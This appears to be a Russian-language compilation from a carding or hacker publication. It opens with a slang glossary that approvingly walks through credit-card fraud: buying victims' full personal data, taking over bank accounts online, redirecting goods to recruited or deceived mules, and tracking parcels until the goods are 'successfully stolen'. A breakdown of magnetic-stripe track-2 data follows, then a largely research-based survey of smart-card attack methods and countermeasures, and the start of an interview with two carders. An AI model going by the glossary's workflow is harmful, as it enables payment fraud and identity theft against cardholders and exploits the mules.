Cash Advance Limit - такую максимальную сумму можно получить по карте деньгами в банкомате всего (не за один раз). Единоразовый, а точнее суточный лимит по CA чаще всего бывает $500. Но в разных банках он может быть больше или меньше.

Термины в разных банках могут отличаться от вышеприведенных, но надеюсь, суть понятна, чтобы не путать баланс к оплате с лимитом на растраты. Основная путаница возникает из за принципиально иного типа карт - дебетовых. Вот там да, сколько положил на счет, столько и можешь потратить, т.е. баланс в прямом понимании.

Слэнг

billing address, биллинг - адрес проживания, куда отправляется Statement.

billing phone - телефон холдера, по которому звонит банк или шоп в случае каких нибудь неувязок.

shipping address, шиппинг - адрес, куда магазин должен отправить заказанный товар. Для крупных покупок требуется, чтобы он совпадал с биллинг адресом или был вписан в банке в свойства карты именно как шиппинг, иначе будут

траблы - trouble, проблема то есть. Траблы с шопом решаются

прозвоном - т.е. звонком в магазин с подтверждением покупки, биллинг и шиппинг адресов и всяческой своей лояльности. Если траблы с английским или немецким языком, можно заказать услуги прозвонщика, который все это профессионально (по возможности) сделает. Прозвонщику нужно сказать всю информацию, которую потребует шоп при разговоре. В разных шопах она разная, но во всех спросят

ордер (order) - номер заказа, сделанного на сайте. О чем договорились прозвонщик и шоп, можно узнать не только со слов прозвонщика, но и на сайте магазина через некоторое время. У ордера могут быть разные статусы в зависимости от магазина и используемого в нем софта. До прозвона дело может даже не дойти, если использовать

энролл (enroll) - доступ к данным карты через сайт банка. Опять же, в каждом банке своя система. Где-то может понадобиться только

MMN (mother's maiden name) - девичья фамилией матери. Где-то вместе с

DOB (date of birth) - датой рождения. Где-то только

SSN (social secure number) - индивидуальный номер налогоплательшика. Где-то комбинация вышеперечисленных с номером ПИН или даже с

DL (driver's license) - номером водительских прав. Обычно это секретная информация. Но ведь существует

пробив - нахождение SSN, DOB, MMN, DL по различным базам данных. Пробивщик за денежку найдет данные почти на любого американца. Если время не позволяет озадачиваться пробивом или пробивщики все попропадали в оффлайн, можно купить

фуллку (full info) - все данные кардхолдера, достаточные для регистрации энролла на сайте банка.

Заэнроллив там карту, можно изменить биллинг телефон на свой, а биллинг адрес на адрес своего или чужого

дропа - человека, согласного принять и переправить куда скажут купленный товар. Делает он это за деньги или красивые обещания, как получится. Вообще этой темой занимается

дроповод - специалист по промыванию мозгов у дропов, чтобы они согласились работать с ворованным товаром. Но бывают не только

разводные дропы - "развели как лоха", но и неразводные дропы. Это партнеры, которые знают, чем занимаются и активно содействуют. Как то ищут съемные квартиры, шлют сканы документов при необходимости, могут прозвонить шоп и т.д. Требуют себе большую долю, часто кидают, но работать с ними проще конечно.

Так вот насчет ордера. Самый лучший и последний его статус:

shipped - отправлено на шиппинг адрес. Если дроповод надежный и дропы у него стабильные, можно начинать плясать, уворовано успешно. Только нужно сообщить дроповоду

трэк (tracking number) - уникальный номер посылки в почтово-курьерской службе, например в DHL, UPS или FedEx. Он появляется на сайте шопа в деталях ордера после отправки. По этому номеру можно отслеживать на сайте выбранной для отправки службы статус посылки, где она находится и что с ней происходит. Как только статус станет

delivered - доставлено, ответственность за товар переходит к дроповоду и в ближайшие дни он заплатит за товар (по идее). Кстати, следите в каком городе то доставлено. А то бывает, что посылка обратно в шоп возвращается и delivered получается слегка не там, где ожидалось.

Из негативных терминов canceled, declined, suspended, FBI, USSS, дроповод кинул. Желаю всем никогда с ними не сталкиваться, ну или хотя бы с минимальными потерями.

Не путайте ДАМПЫ с СС!

Итак, сейчас опишем что у нас должно быть написано на дорожке. Нас интересует вторая дорожка, и что же мы на ней можем увидеть?:

Она может содержать до 40 символов:

Сначала идет стартовый символ - %

Потом идет PAN - до 19 цифр, в нашем случае это номер карты.

В него входит код эмиттера карты (IIN: Issuer Identification Number) (до 6 символов), который в свою очередь состоит из:

Основного промышленного идентификатора (MII: Major Industry Identifier) (до 2х символов):

0: Зарезервировано для будущего использования стандартом ISO/TC 68.
00: Не для выпуска карт
1: Авиалинии.
2: Авиалинии и для будущего использования.
3: Путешествия и развлечения.
4: Банк/финансы.
5: Банк/финансы.
59: Финансовые организации не попадающие в рамки ISO.
6: Банки и мерчи.
7: Топливная промышленность.
8: Телекоммуникации и для будущего использования.
89: Телекоммуникации и для частных агентств.
9: Зарезервировано для национального использования.

Далее идет код эмиттера (II: Issuer Identifier), до 5 цифр, в некоторых случаях пишется длинна INN или его размер если он выходит за пределы ISO. Если MII равен 9 то первые три цифры - это код страны(для нас интереса не представляет)

Потом идет индивидуальный номер аккаунта (IAI: Individual Account Identification), до 12 цифр, назначается организацией, выдавшей карту

Затем идет одна цифра, используемая для проверки номера и прочей информации, вычисляется по формуле: (чуть попозже выложу формулу)

PAN мастеркарда состоит из не более 16 символов, а у VISA - 13 или 16, включая проверочную цифру.

Далее идет разделитель, один символ - =

За ним следует в некоторых случаях код страны(если PAN начинается с 59), он определяется в ISO 3166: 724 для Испании, 840 для USA и тд.

Потом в большинстве случаев идет дата окончания действия карты в формате ГГ ММ (год месяц).

Затем идет трехсимвольный сервисный код, он состоит из:

Первая цифра, определяет где можно использовать карту:

0: Зарезервировано для будущего использования.
1: Для международного использования.
2: Для международного использования, с ограничениями.
3: Зарезервировано для будущего использования.
4: Зарезервировано для будущего использования.
5: Только для внутреннего использования, кроме заранее оговоренных соглашений.
6: Только для внутреннего использования, кроме заранее оговоренных соглашений, с ограничениями.
7: Не для оплаты, кроме заранее оговоренных соглашений.
8: Зарезервировано для будущего использования.
9: Для проверки.

Вторая цифра, определяет условия использования/авторизации карты(Authorization processing):

0: Транзакции осуществляются по стандартным правилам.
1: Зарезервировано для будущего использования.
2: Транзакция осуществляется эмиттером, должна быть онлайн.
3: Зарезервировано для будущего использования.
4: Транзакция осуществляется эмиттером, должна быть онлайн, кроме заранее оговоренных соглашений.
5: Зарезервировано для будущего использования.
6: Зарезервировано для будущего использования.
7: Зарезервировано для будущего использования.
8: Зарезервировано для будущего использования.
9: Зарезервировано для будущего использования.

Третья цифра, определяет сервисы и условия требования PIN

0: Без ограничений, нужен PIN.
1: Без ограничений.
2: Товары и услуги (не наличка).
3: ATM только и нужен PIN.
4: Только деньги.
5: Товары и услуги (не наличка) и нужен PIN.
6: Без ограничений, PIN по требованию.
7: Товары и услуги (не наличка) и PIN по требованию.
8: Зарезервировано для будущего использования.
9: Зарезервировано для будущего использования.

Потом идет хэш PVV (PIN Verification Value), 5 символов, за ним символы, зарезервируемые для использования эмиттером. И в конце всего стоит завершающий символ - ?

Пример второй дорожки(придуманный): ;4598530106131217=06081211834918387276?

Обзор методов взлома смарт-карт

Индустрия смарт-карт переживает период мощного расцвета. В 2002 году по всему миру было продано почти 2 миллиарда интеллектуальных карточек со встроенным микрочипом, а в ближайшие годы ожидается рост этих цифр в разы.

Причины этого просты - области применения смарт-карт все время расширяются: от телефонной карты до жетона аутентификации пользователя ПК, от "электронного кошелька" для хранения цифровых наличных до цифрового паспорта-идентификатора. Массовое внедрение смарт-карт в повседневную жизнь сопровождается непременными заверениями официальных представителей индустрии о том, что чип-карты - это наиболее безопасная из существующих на сегодня технологий, которую сложно (читай - практически невозможно) вскрыть. Но мы с тобой знаем, что это вовсе не так :).

Нравится это кому-то или нет, но вскрытие смарт-карт - явление весьма давнее и распространенное повсеместно. Как свидетельствуют специалисты, примерно с 1994 года практически все типы смарт-карточных чипов, использовавшихся в европейских, а затем в американских и азиатских системах платного телевидения, были успешно вскрыты крякерами при помощи методов обратной инженерной разработки. А добытые секреты карт (схема и ключевой материал) затем продавались на черном рынке в виде нелегальных клон-карт для просмотра закрытых ТВ-каналов на халяву.

Менее освещено в прессе другое направление - подделка телефонных смарт-карт или электронных кошельков. Однако известно, что и в этой области далеко не все в порядке с противодействием взлому. Индустрии приходится регулярно заниматься обновлением технологий защиты процессора смарт-карт, крякеры в ответ разрабатывают более изощренные методы вскрытия, и так до бесконечности.

Разновидности технологий

Классификация методов вскрытия смарт-карт может несколько различаться у разных авторов, однако чаще всего выделяют следующие категории атак, которые обычно применяются в разных сочетаниях друг с другом.
  • Технологии микрозондирования - с помощью микроскопа и иглы микропробника позволяет получить доступ непосредственно к поверхности чипа, где атакующий регистрирует прохождение информации (побитно), манипулирует процессами и вмешивается в работу интегральной схемы.
  • Программные атаки- используют обычный коммуникационный интерфейс процессора смарт-карты и эксплуатирует уязвимости защиты, выявленные в протоколах, криптографических алгоритмах и других особенностях конкретной реализации схемы. Отмечу, что чем более зрелой является технология защиты, тем чаще приходится сочетать этот метод с другими методами атак.
  • Анализ побочных каналов утечки информации- атакующий с высокой по времени частотой снимает аналоговые характеристики колебаний в питании и интерфейсных соединениях, а также любые другие электромагнитные излучения, порождаемые элементами схемы процессора (транзисторами, триггерами и т.п.) в ходе обычной работы.
  • Технологии индуцирования сбоев- напротив, создаются нештатные условия эксплуатации, чтобы вызвать ошибки в работе процессора и открыть таким образом дополнительные каналы доступа к защищенной информации.
Разрушающие атаки

Типичный чиповый модуль смарт-карты имеет тонкое пластиковое основание размером порядка одного квадратного сантиметра с контактными зонами с обеих сторон. Одна сторона модуля видна на самой смарт-карте и контактирует со считывателем. Кремниевая матрица приклеена к другой стороне основания (подсоединение с помощью тонких золотых или алюминиевых проводов). Сторона пластины, где находится чип, покрыта эпоксидной смолой, и такой чиповый модуль вклеивается в карту.

Вынуть чип из карты легко. Прежде умельцы вынимали с помощью острого ножа или ланцета, срезая пластик тыльной стороны карты до тех пор, пока не покажется эпоксидка. Позже стали быстро вынимать чип, просто разогревая пластмассу до мягкого состояния. Далее эпоксидный слой удаляется нанесением нескольких капель концентрированной азотной кислоты (более 98%). Прежде чем кислота успевает растворить слишком много эпоксидного слоя и затвердеть, кислоту и смолу смывают ацетоном. Процедура повторяется от 5 до 10 раз, пока полностью не покажется кремниевая матрица. Производить подобное надругательство над чипом необходимо аккуратно, чтобы не повредить соединительную проводку, тогда он останется работоспособным.

Если процессор совершенно новый, придется создать карту его схем. Сейчас для этого обычно применяют оптический микроскоп и цифровую камеру, с помощью которых делают большую (размером в несколько метров) мозаику из снимков поверхности чипа высокого разрешения.

У большинства чипов имеется защитный поверхностный слой (пассивация) из оксида или нитрата кремния, который предохраняет их от излучений оборудования и диффузии ионов. Азотная кислота на него не действует, поэтому для его удаления специалисты используют сложный метод сухого травления. Но это не единственная возможность для доступа к поверхности.

Другим методом, особенно когда схема в целом известна, является использование игл-микропробников, которые с помощью ультразвуковой вибрации удаляют защитный слой непосредственно под точкой контакта. Кроме того, для локального удаления защитного слоя применяются лазерные резаки-микроскопы, используемые в лабораториях клеточной биологии.

Описанная техника вскрытия, которую, я надеюсь, ты не опух читать, успешно применяется любителями-крякерами. Именно любителями, так как технологии, описанные дальше, доступны только хорошо оснащенным лабораториям, которые занимаются изучением полупроводников. В мире насчитываются сотни таких лабораторий (к примеру, в университетах и промышленных исследовательских центрах). Наиболее продвинутые крякеры арендуют эту технику.

Исследование техники разрезания чипа ведет к более общей (и сравнительно менее изученной) проблеме - атакам, которые включают в себя активную модификацию исследуемого чипа, а не просто пассивное его исследование. К примеру, есть все основания полагать, что некоторые успешные атаки пиратов на систему платного телевидения проводились с использованием рабочих станций с фокусированием ионного пучка (Focused Ion Beam workstation - FIB). Такой аппарат может вырезать траки в металлизированном слое чипа и формировать новые траки или изолирующие слои. Кроме того, FIB может имплантировать ионы для изменения толщины слоя кремния и даже строить сквозные переходы к проводящим структурам в нижележащих слоях чипа. Такие аппараты стоят несколько миллионов долларов, но, как показывает практика, не слишком богатые злоумышленники арендуют дорогое оборудование на некоторое время у крупных полупроводниковых компаний.

Обеспеченные таким инструментарием атаки на смарт-карты становятся более простыми и мощными. Типичная атака заключается в отсоединении от шины почти всех процессов ЦПУ, кроме памяти EEPROM и той компоненты ЦПУ, что генерирует доступ по чтению. Например, программный счетчик может быть оставлен подсоединенным таким образом, что области памяти по порядку становятся доступны на считывание по мере подачи тактовых импульсов.

Как только это сделано, атакующему требуется лишь одна игла микропробника для считывания всего содержимого EEPROM. В результате процесс анализа становится более легким, чем при пассивном исследовании, когда обычно анализируется только трасса выполнения. Также это помогает избежать чисто механических трудностей одновременной работы с несколькими иглами-микропробниками на линиях шины, ширина которых составляет лишь несколько микрон.

Технологии индуцирования сбоев (глич-атаки)

В принципе, создателям вычислительной техники давно известно, что к инженерно-защищенным устройствам, типа смарт-карт, которые обычно малы и компактны, с целью вызова вычислительной ошибки можно применить некоторые уровни радиационного облучения или нагревания, подачу неправильного напряжения питания или нестандартную тактовую частоту. Известно также и то, что при возникновении сбоя в вычислениях компьютерное устройство может выдать информацию, полезную для восстановления секретных данных. Однако насколько серьезна эта угроза в действительности, долгое время мало кто подозревал.

В конце сентября 1996 года коллектив авторов из Bellcore (научно-исследовательский центр американской компании Bell) сообщил о том, что обнаружена серьезная потенциальная слабость общего характера в защищенных криптографических устройствах, в частности, в смарт-картах для электронных платежей (D. Boneh, R.A. DeMillo, R.J. Lipton: "On the Importance of Checking Cryptographic Protocols for Faults", www.demillo.com/PDF/smart.pdf). Авторы назвали свой метод вскрытия "Криптоанализ при сбоях оборудования" (Cryptanalysis in the Presence of Hardware Faults). Суть же его в том, что, искусственно вызывая ошибку в работе электронной схемы с помощью ионизации или микроволнового облучения, а затем сравнивая сбойные значения на выходе устройства с заведомо правильными значениями, теоретически можно восстанавливать криптографическую информацию, хранящуюся в смарт-карте. Исследования ученых показали, что новой угрозе подвержены все устройства, использующие криптоалгоритмы с открытыми ключами для шифрования информации и аутентификации пользователя. Это могут быть смарт-карты, применяемые для хранения данных (например, электронных денег), SIM-карточки для сотовой телефонии, карточки, генерирующие электронные подписи или обеспечивающие аутентификацию пользователя при удаленном доступе к корпоративным сетям. Правда, разработанная в Bellcore атака была применима для вскрытия ключей исключительно в криптосхемах с открытым ключом - RSA, алгоритм цифровой подписи Рабина, схема идентификации Фиата-Шамира и т.д.

Главным результатом публикации работы Bellcore стало то, что к известной в узком кругу проблеме было привлечено внимание гораздо большего числа исследователей. И меньше чем через месяц после появления статьи Бонэ-ДеМилло (в октябре 1996 года) стало известно о разработке аналогичной теоретической атаки в отношении симметричных криптоалгоритмов, то есть шифров закрытия данных с общим секретным ключом. Новый метод был разработан знаменитым тандемом израильских криптографов Эли Бихамом и Ади Шамиром, получив название "Дифференциальный анализ искажений" (сокращенно ДАИ).

На примере самого распространенного блочного шифра DES эти авторы продемонстрировали, что в рамках той же "беллкоровской" модели сбоя в работе аппаратуры можно "вытащить" полный ключ DES из защищенной смарт-карты путем анализа менее 200 блоков шифртекста (блок DES - 8 байт). Более того, впоследствии появился еще ряд работ Бихама - Шамира с описанием методов извлечения ключа из смарт-карты в условиях, когда о реализованной внутри криптосхеме неизвестно практически ничего. Окончательную версию статьи с описанием этой работы утягивай с http://www.cs.technion.ac.il/users/wwwb/cgi-bin/tr-info.cgi/1997/CS/CS0910

Анализ побочных каналов утечки информации

Летом 1998 года пришло известие еще об одном методе вскрытия смарт-карт, более чем успешно реализованном на практике. Совсем небольшая, состоящая из 4 человек консалтинговая криптофирма Cryptography Research из Сан-Франциско разработала чрезвычайно эффективный аналитический инструментарий для извлечения секретных ключей из криптографических устройств. Забавно, но, по словам главы фирмы Пола Кочера, исследователям "не удалось найти ни одной карты, которую нельзя было бы вскрыть".

При этом Кочер по образованию биолог, а хакерством занимался с детства как хобби. Не исключено, что именно биологическое образование помогло ему выработать собственный стиль анализа "черных ящиков", относясь к ним как к живым организмам и внимательно исследуя все доступные признаки их "жизнедеятельности".

Кочер и его коллеги, по сути, переизобрели секретные методы спецслужб и научились вскрывать защиту смарт-карт с помощью привлечения аппарата математической статистики и алгебраических методов исправления ошибок для анализа флуктуаций (небольшие колебания) в потреблении чипом электропитания. Делалось это примерно в течение полутора лет с 1996 по 1998 год, когда специалисты Cryptography Research выясняли, каким образом можно было бы повысить стойкость портативных криптографических жетонов, включая смарт-карты. Не предавая свои исследования широкой огласке, они знакомили сообщество производителей смарт-карт с разработанными в фирме видами атак, получившими названия "простой анализ питания" (ПАП) и "дифференциальный анализ питания" (ДАП).

Вполне очевидно, что такие методы анализа заслуживают самого серьезного внимания, поскольку атаки такого рода можно проводить быстро и используя уже готовое оборудование ценой от нескольких сотен до нескольких тысяч долларов. Базовые же концепции новой методики вскрытия сформулированы в более ранней и довольно известной работе Пола Кочера "Криптоанализ на основе таймерной атаки" (в 1995 году). В этой работе было продемонстрировано, что можно вскрывать криптоустройства, просто точно замеряя интервалы времени, которые требуются на обработку данных.

Что же касается ПАП-атак, то здесь аналитик непосредственно наблюдает за динамикой потребления энергии системой. Количество расходуемой энергии изменяется в зависимости от выполняемой микропроцессором инструкции, а для точного отслеживания флуктуаций в потреблении питания можно использовать чувствительный амперметр. Так выявляются большие блоки инструкций (циклы DES, операции RSA и т.п.), поскольку эти операции, выполняемые процессором, имеют внутри себя существенно различающиеся по виду фрагменты. При большем усилении удается выделять и отдельные инструкции. В то время как ПАП-атаки главным образом строятся на визуальном анализе с целью выделения значимых флуктуаций питания, значительно более эффективный метод ДАП построен на статистическом анализе и технологиях исправления ошибок для выделения информации, имеющей корреляции с секретными ключами.

Новые методы атак и считывания информации из памяти

В июне 2002 года был обнародован еще один метод вскрытия смарт-карт и защищенных микроконтроллеров, получивший название "optical fault induction attack" ("атака оптическим индуцированием сбоев" - www.cl.cam.ac.uk/~sps32/ches02-optofault.pdf). Этот класс атак был обнаружен и исследован в Кембриджском университете аспирантом Сергеем Скоробогатовым (кстати, выпускником МИФИ 1997 года) и его руководителем Россом Андерсоном.

Суть метода в том, что сфокусированное освещение конкретного транзистора в электронной схеме стимулирует в нем проводимость, чем вызывается кратковременный сбой. Такого рода атаки оказываются довольно дешевыми и практичными, для них не требуется сложного и дорогого лазерного оборудования. Например, сами кембриджские исследователи в качестве мощного источника света использовали фотовспышку, купленную в магазине подержанных товаров за 20 фунтов стерлингов.

Для иллюстрации мощи новой атаки была разработана методика, позволяющая с помощью вспышки и микроскопа выставлять в нужное значение (0 или 1) любой бит в SRAM-памяти микроконтроллера. Методом "оптического зондирования" (optical probing) можно индуцировать сбои в работе криптографических алгоритмов или протоколов, а также вносить искажения в поток управляющих команд процессора. Понятно, что перечисленные возможности существенно расширяют уже известные "сбойные" методы вскрытия криптосхем и извлечения секретной информации из смарт-карт.

Индустрия, как обычно, пытается всячески принизить значимость нового метода вскрытия, поскольку он относится к классу разрушающих атак, сопровождающихся повреждением защитного слоя в чипе смарт-карты. Однако, по свидетельству Андерсона, злоумышленники могут обойтись и минимальным физическим вмешательством: кремний прозрачен в инфракрасном диапазоне, поэтому атаку можно проводить прямо через кремниевую подложку с задней стороны чипа, сняв лишь пластик. Используя же рентгеновское излучение, карту и вовсе можно оставить нетронутой.

Меры противодействия

Арсенал средств защиты смарт-карт на сегодняшний день весьма разнообразен. Разрушающим методам вскрытия могут противостоять емкостные датчики или оптические сенсоры под светонепроницаемой оболочкой (что крякеры давно научились обходить). Либо "специальный клей" - покрытие для чипов, которое не только непрозрачно и обладает проводимостью, но также надежно противостоит попыткам уничтожить его, обычно разрушая кремниевый слой, находящийся под ним. Такие покрытия относятся к федеральному стандарту США FIPS 140-1 и широко используются в американской военной промышленности, но повсеместно распространенными в быту их назвать нельзя.

Ряд недорогих и эффективных методов противодействия "дифференциальному анализу питания (ДАП)" и "дифференциальному анализу искажений (ДАИ)" известен по разработкам Cryptography Research. В частности, созданы особые аппаратные и программные методы, обеспечивающие значительно меньший уровень утечек компрометирующей информации, внесение шума в измерения, декоррелирование (разделение взаимозависимостей) внутренних переменных и секретных параметров, а также декоррелирование по времени криптографических операций.

Значительный ряд новых методов защиты предложен компьютерными лабораториями Лувена и Кембриджа (www.cl.cam.ac.uk/Research/Security/tamper/). Суть одного из них, например, заключается в замене традиционных электронных схем самосинхронизирующейся "двухрельсовой" (dual-rail) схемой, где логические 1 и 0 не кодируются, как обычно, импульсами высокого (H) и низкого (L) напряжения в единственном проводнике, а представляются парой импульсов (HL или LH) в двух проводниках. В этом случае появление "нештатной" пары импульсов вида (HH) сразу становится сигналом тревоги, приводящим, как правило, к перезагрузке процессора.

Одно дело читать обо всех этих методах на бумаге и совсем другое - увидеть, как это работает реально. По свидетельству специалистов, открывающаяся картина действительно впечатляет. И стимулирует, конечно же, на поиск новых мер противодействия с еще большим рвением.

Устройство смарт-карты

Типичная смарт-карта - это 8-битный микропроцессор, постоянное запоминающее устройство (ROM), оперативная память (RAM), электрически перепрограммируемая память (EEPROM или FLASH, где, в частности, хранится криптографический ключевой материал), последовательные вход и выход. Все это хозяйство размещается в одном чипе, заключенном в корпус - обычно пластиковую карту размером с кредитку.

Смарт-карты по своим потенциальным возможностям имеют целый ряд важных преимуществ по сравнению с другими технологиями. Обладая собственным процессором и памятью, они могут участвовать в криптографических протоколах обмена информацией, и, в отличие от карточек с магнитной полоской, здесь хранимые данные можно защищать от неавторизованного доступа. Беда лишь в том, что реальная стойкость этой защиты зачастую переоценивается.

Далее будет представлен краткий обзор наиболее важных технологий, используемых при вскрытии смарт-карт. Эта информация важна для любого человека, желающего получить реальное представление о том, как происходит вскрытие защищенных устройств, и каких затрат это стоит. Естественно, тщательное изучение применяемых методов вскрытия позволяет вырабатывать адекватные контрмеры и создавать намного более эффективную защиту смарт-карт.

Все технологии микрозондирования по сути своей являются разрушающими атаками. Это значит, что для их реализации требуются многие часы, иногда недели работы в условиях специализированной лаборатории, а сам исследуемый чип при этом разрушается. Остальные три категории относятся к неразрушающим атакам. Иначе говоря, после того, как злоумышленник подготовил такую атаку в отношении конкретного типа процессора и уже известной версии программного обеспечения, он может с легкостью воспроизвести ее в отношении любой другой карты того же типа. При этом атакуемая карта физически не повреждается, а оборудование, использованное для атаки, обычно можно замаскировать под обычный ридер (считыватель смарт-карт).

Очевидно, что неразрушающие атаки особо опасны, поскольку не оставляют за собой следов. Но понятно и то, что сама природа атак такого рода подразумевает детальное знание процессора и программного обеспечения конкретной карты. С другой стороны, для разрушающих атак микрозондированием требуется очень мало исходных знаний о конкретной конструкции.

Таким образом, атака на новую смарт-карту обычно начинается с разрушающей обратной инженерной разработки, результаты которой помогают создать более дешевые и быстрые неразрушающие атаки. В частности, именно такая последовательность событий многократно отмечена при вскрытии карт условного доступа в системах платного телевидения.

К этому типу атак относят те, которые сопровождаются вскрытием корпуса устройства. Публичное представление таких методов, применяемых в крякерском подполье, впервые было сделано в 1996 году исследователями из Кембриджского университета Россом Андерсоном и Маркусом Куном в ходе второго семинара USENIX по электронной коммерции (Росс Андерсон, Маркус Кун "Стойкость к вскрытию. Предупреждение", www.cl.cam.ac.uk/~mgk25/tamper.html). Более подробно эти технологии описаны в совместной статье Куна и Оливера Кеммерлинга 1999 года "Принципы конструирования защищенных процессоров смарт-карт" (www.cl.cam.ac.uk/~mgk25/sc99-tamper.pdf), а также в последующей докторской диссертации Куна, которая, правда, в интернете не опубликована.

В начале 1990-х годов в Кавендишской лаборатории Кембриджа была создана технология обратного восстановления схемы сложных кремниевых чипов, позволяющая аккуратно снимать слои микросхемы один за другим. Одно из примененных здесь новшеств - техника показа примесных N и Р слоев на основе эффекта Шоттки: тонкая пленка из золота или палладия накладывается на чип, образуя диод, который может быть виден в электронном луче. Изображения последовательных слоев чипа вводятся в компьютер, специальное программное обеспечение очищает первоначально нечеткие образы, выдает их ясное представление и распознает стандартные элементы чипа. Эта система была протестирована на процессоре Intel 80386 и ряде других устройств. Работа над восстановлением 80386 заняла две недели, причем для правильной реконструкции обычно требуется около шести образцов чипа. Результатом работ могут быть диаграммы масок и схем или даже список библиотечных ячеек, из которых чип был сконструирован.

В условиях, когда конструкция и принципы функционирования чипа уже известны, существует очень мощная технология, разработанная в IВМ для исследования чипа в работе даже без удаления защитного слоя. Для измерения рабочих характеристик устройства над ним помещают кристалл ниобата лития. Показатель преломления этой субстанции изменяется при изменении электрического поля, и потенциал находящегося под ней кремния может считываться с помощью ультрафиолетового лазерного луча, проходящего через кристалл под скользящим углом наклона. Возможности этой технологии таковы, что можно считывать сигнал в 5 В с частотой до 25 МГц. По сути, это стандартный путь для хорошо оснащенных лабораторий при восстановлении криптоключей в чипах, конструкция которых известна.

Чаще всего критика в адрес дифференциального анализа искажений (особенно со стороны выпускающих смарт-карты фирм) сводилась к тому, что вся эта методика носит сугубо теоретический характер. Ведь никто не продемонстрировал на практике, что сбойные ошибки можно вызывать именно в криптосхеме, причем конкретно в алгоритме разворачивания ключа.

Но уже весной 1997 года появилось описание не теоретической, а весьма практичной атаки, получившей название "усовершенствованный метод ДАИ". Авторы атаки (кембриджский профессор Росс Андерсон и его аспирант из Германии Маркус Кун) продемонстрировали, что могут извлекать ключ из смарт-карты менее чем по 10 блокам шифртекста. В основу нового метода была положена модель принудительных искажений или "глич-атак" (от английского glitch - всплеск, выброс), реально практикуемых крякерами при вскрытии смарт-карт платного телевидения.

Под глич-атаками понимаются манипуляции с тактовой частотой или напряжением питания смарт-карт, что позволяет выдавать дампы с ключевым материалом на порт выхода устройства. Эффективность глич-атак продемонстрирована кембриджскими авторами как на симметричных криптосхемах, так и на вскрытии алгоритмов с открытым ключом. Ссылки на соответствующие статьи дыбай на сайте Росса Андерсона www.cl.cam.ac.uk/users/rja14/#Reliability.

В традиционном анализе криптоустройств и защищенных протоколов принято предполагать, что входное и выходное сообщения доступны злоумышленнику, а какая-либо информация о ключах ему неизвестна. Однако любое электронное устройство состоит из конкретных элементов, выдающих в окружающую среду информацию о своей работе. А значит, на самом деле, атакующей стороне может быть доступна и всевозможная побочная информация, выдаваемая криптоустройством: электромагнитное излучение, сигналы об ошибках или об интервалах времени между выполняемыми инструкциями, колебания в потреблении электропитания и другие данные. Вообще, все это очень хорошо известно военным и спецслужбам, где разработаны специальные методы работы с побочными каналами утечки информации, но тема эта (под кодовым наименованием Tempest) строго засекречена и открытых публикаций о ней очень мало.

Этими же специалистами из Кембриджа совместно с учеными компьютерной лаборатории Лувенского университета (Бельгия) недавно разработаны еще несколько новых методов считывания информации из защищенных чипов смарт-карт (David Samyde, Sergei Skorobogatov, Ross Anderson, Jean-Jacques Quisquater: On a New Way to Read Data from Memory - www.ftp.cl.cam.ac.uk/ftp/users/rja14/SISW02.pdf). Общим для данных методов является то, что они индуцируют поддающиеся замерам изменения в аналоговых характеристиках ячеек памяти.

Например, сканируя ячейки сфокусированным лазером или наводя в них вихревые токи с помощью индуктивной спирали на игле микропробника, можно повысить электромагнитные утечки, выдающие записанное там значение бита, но при этом само это значение сохраняется в ячейке ненарушенным. Сильным охлаждением чипа в нужный момент времени можно "заморозить" содержимое интересующего регистра и считать из него (ключевую) информацию, обычно хранящуюся или передаваемую в зашифрованном виде. Эта технология применима к самым разным типам памяти от RAM до FLASH и реально продемонстрирована считыванием ключей DES из ячеек RAM без какого-либо физического контакта с чипом.

Эта работа проведена учеными по заказу проекта Евросоюза G3Card и ставит перед собой цель создания смарт-карт следующего поколения, способных максимально противостоять современным атакам, вплоть до "полуразрушающих". Создание абсолютной защиты, естественно, не является реалистичным для устройств, применяемых в действительности, одно из главных достоинств которых - дешевизна.

Разработкой мер защиты смарт-карт от вскрытия, конечно же, занимаются не только в университетах или маленьких фирмах, вроде Cryptography Research Пола Кочера или Advanced Digital Security Research Оливера Кеммерлинга. Большая работа ведется и непосредственно в смарт-карточной индустрии, где, правда, предпочитают в подробностях не распространяться на эту тему. Но иногда кое-какая информация все же просачивается.

Так, в прошлом году на криптографической выставке-конференции RSA-2002 интереснейшая экспозиция была устроена компанией Datacard Group (https://www.entrust.com), специализирующейся на разработке смарт-карт. На своем выставочном стенде сотрудники фирмы развернули некий "полевой вариант" небольшой электронной лаборатории. Буквально на глазах изумленной публики демонстрировалось вскрытие смарт-карт с помощью описанных выше методов ДАП и ДАИ. Оборудования для этих работ требовалось совсем немного - осциллограф, компьютер да несколько "специальных коробочек".

Для зрителей процесс вскрытия смарт-карты выглядел примерно так: "Сейчас вы видите на экране осциллографа последовательность вертикальных всплесков. Это циклы DES-алгоритма, шифрующего информацию в чипе карты. Давайте увеличим разрешение картинки. Внутри цикла вы видите пики характерной формы - это S-боксы, преобразующие нужный нам ключ. Давайте запустим программу вскрытия, которая по особенностям этих сигналов отыскивает биты секретной информации, и вот через минуту или две мы получаем ключ на выходе программы".

Тройной DES вскрывался аналогично, но примерно раза в 3 раза дольше. Те же самые несколько минут уходили у аналитиков Datacard на отыскание пары больших простых чисел, образующих ключ в алгоритме RSA. Для этого не использовались, ясное дело, ужасно трудоемкие методы факторизации, а "просто" внимательно анализировались реакции чипа смарт-карты на небольшие варьирования в напряжении и частоте при подаче питания...

Практически все типы смарт-карточных чипов в европейских, а затем в американских и азиатских системах платного телевидения были успешно вскрыты крякерами при помощи методов обратной инженерной разработки.

Общение с кардером

Блуждая как-то ночью по просторам Сети, я случайно наткнулся на сайт, целиком посвященный кардингу. Набравшись смелости, я завязал беседу с владельцами ресурса. Знакомьтесь - David и Graf.

Бытует мнение, что все кардеры - замкнутые звероподобные и скрытные существа, которых не то что разговорить, трудно просто отловить живьем. На самом деле они - самые обычные люди, а быть скрытными их вынуждает хобби, которое подпадает под определенные статьи УК. Но не все занимаются кардингом на практике (знают только в теории), либо переросли свое увлечение и давно отошли от дел. Кто-то вспоминает с ностальгией, кто-то создает свои ресурсы, а кто-то на этих ресурсах еще и зарабатывает, основав для собратьев плацдарм, помогающий оперативно обмениваться нужной информацией.

XS: Для начала расскажите немного о себе. Имя, возраст, где обитаете?

David: Зовут меня Серега, 19 лет от роду, живу в Минске.

Graf: А меня величают Костя, 21 год уже пошел, живу в далекой Кемеровской области, что в славном государстве Россия.

XS: Как прошло ваше детство? С кровати не падали?

David: Детство прошло отлично, хотя с компьютерами оно связано не было.

Graf: Да нормально, не жалуюсь, всякое в жизни бывает - и плохое, и хорошее.

XS: В каком году появился первый комп? Чем увлекались?

